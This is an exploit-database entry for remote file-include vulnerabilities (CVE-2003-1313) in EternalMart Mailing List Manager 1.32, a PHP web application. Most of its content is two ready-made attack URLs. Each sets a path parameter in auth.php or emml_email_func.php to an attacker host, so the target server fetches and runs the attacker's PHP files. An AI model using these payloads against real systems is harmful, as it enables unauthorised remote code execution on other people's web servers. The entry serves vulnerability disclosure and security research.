EternalMart Mailing List Manager 1.32 - Remote File Include Vulnerabilities

2003-10-04T00:00:00
ID EDB-ID:23218
Type exploitdb
Reporter frog
Modified 2003-10-04T00:00:00

Description

EternalMart Mailing List Manager 1.32 Remote File Include Vulnerabilities. CVE-2003-1313 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/8767/info

EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. 

http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php

http://[target]/emml_email_func.php?emml_path=http://[attacker] will
include the file :
http://[attacker]/class.html.mime.mail.php